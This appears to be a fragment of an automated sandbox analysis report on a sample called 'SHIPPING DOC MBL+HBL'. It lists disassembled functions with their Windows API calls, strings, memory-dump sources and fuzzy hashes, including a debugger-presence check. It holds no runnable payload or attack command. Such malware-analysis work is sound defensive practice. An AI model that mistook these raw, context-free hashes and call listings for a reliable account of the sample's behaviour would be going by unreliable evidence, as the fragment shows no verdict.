                    • Instruction Fuzzy Hash: E501F931605225ABCF04EB64CC958FE73A9EF063107141B19F875772C2DE35584C8750
                    Function 00E68E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: e7af5d5bce844c6f8b566b879b53a49eb512fea426b203ca48bdb1780e6d93e1
                    • Instruction ID: 002cec6735bd345eb9f8455a7d7111c4a667b019b9cefa17b01cd4135e5b2f03
                    • Opcode Fuzzy Hash: e7af5d5bce844c6f8b566b879b53a49eb512fea426b203ca48bdb1780e6d93e1
                    • Instruction Fuzzy Hash: 2701F9729442286EDB28C6A8DC16EFE7BF89B15301F00459BF552E2181E9B5E604C760
                    Function 00E58FBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E5902D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 5d5225331396839c3735194e6bbeb2448c1c304e3159d682a47db16395735ba7
                    • Instruction ID: 375ecaee63e043c42f7fa41bde17a791b5bd616c96da746ba764f89cc3a8b4f8
                    • Opcode Fuzzy Hash: 5d5225331396839c3735194e6bbeb2448c1c304e3159d682a47db16395735ba7
                    • Instruction Fuzzy Hash: 4F01B171B41209ABCB14EBA0C8969EB73A8DF05340F24252AB846772C2DE255E4C9661
                    Function 00E59044 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E590B0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: bed32a47e67dd83b0cfa5236bc122ff0b20c407aab4efa437be7669dfec68d6b
                    • Instruction ID: 3f565ec05622c4f5e76acbf98c4fe61ec54fab9b0fda6d9a1b0027f14391d546
                    • Opcode Fuzzy Hash: bed32a47e67dd83b0cfa5236bc122ff0b20c407aab4efa437be7669dfec68d6b
                    • Instruction Fuzzy Hash: 1801F771B41209ABCF14EB64C8469FF73E88F04301F1429257C46732C2DA255E4C9671
                    Function 00E5C7AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00E5C7F6
                      • Part of subcall function 00E5CB06: _memmove.LIBCMT ref: 00E5CB50
                      • Part of subcall function 00E5CB06: VariantInit.OLEAUT32(00000000), ref: 00E5CB72
                      • Part of subcall function 00E5CB06: VariantCopy.OLEAUT32(00000000,?), ref: 00E5CB7C
                    • VariantClear.OLEAUT32(?), ref: 00E5C818
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Variant$Init$ClearCopy_memmove
                    • String ID: d}
                    • API String ID: 2932060187-1207350282
                    • Opcode ID: 905b0f5e73b5e8f3a0797a40a90e18d4c071d07cab48b399b3bd97cdd561d339
                    • Instruction ID: 2d76db331c7552767f7ecdaa15098e05cb488982230bb2599f7144a9c1b64dbe
                    • Opcode Fuzzy Hash: 905b0f5e73b5e8f3a0797a40a90e18d4c071d07cab48b399b3bd97cdd561d339
                    • Instruction Fuzzy Hash: 521100719007089FC720DF9AD88589BF7F8FF18314B50892FE58AE7652E771A948CB90
                    Function 00E64FCF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 584521809461d2d7571594527f904e390c389c488d6bfb91101de178dceacd16
                    • Instruction ID: cac3e31bec1209cb4f026807a7a561117d67f5bfd0d5993ec4751b868abd98da
                    • Opcode Fuzzy Hash: 584521809461d2d7571594527f904e390c389c488d6bfb91101de178dceacd16
                    • Instruction Fuzzy Hash: 29E092326002292AE7209AAAAC09EA7F7ACEB55760F101067FD04F3151D961AA4587E1
                    Function 00E3B441 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E3B494: _memset.LIBCMT ref: 00E3B4A1
                      • Part of subcall function 00E20AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E3B470,?,?,?,00E0100A), ref: 00E20AC5
                    • IsDebuggerPresent.KERNEL32(?,?,?,00E0100A), ref: 00E3B474
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E0100A), ref: 00E3B483
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E3B47E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: 964dc09943d34ccb87b9497b7c350490ebffbad99b6ceb63f480b6960c0c334c
                    • Instruction ID: 6edf05854477c7d46945c894b677e3ae191cf32687d0b3b58d31256b1db71d01
                    • Opcode Fuzzy Hash: 964dc09943d34ccb87b9497b7c350490ebffbad99b6ceb63f480b6960c0c334c
                    • Instruction Fuzzy Hash: 17E06DB02007108FD7319F69E4097467BE0AB04704F01992DE596F6252EBB5E488CBA1
                    Function 00E859CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                    Download Yara Rule
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E859D7
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E859EA
                      • Part of subcall function 00E652EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65363
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: da94a169f050a8604657b9312826ecdddeea50dd2332bfec56ef5471cbee0cbe
                    • Instruction ID: eec5b9c20d8d968b203d06b76de6904841e2f72904161bd24ff320f4af1a890e
                    • Opcode Fuzzy Hash: da94a169f050a8604657b9312826ecdddeea50dd2332bfec56ef5471cbee0cbe
                    • Instruction Fuzzy Hash: 72D0C932384711BAE664BB71AC1BFD76A65AB00B50F101935B259BA1E0D9E0A804C754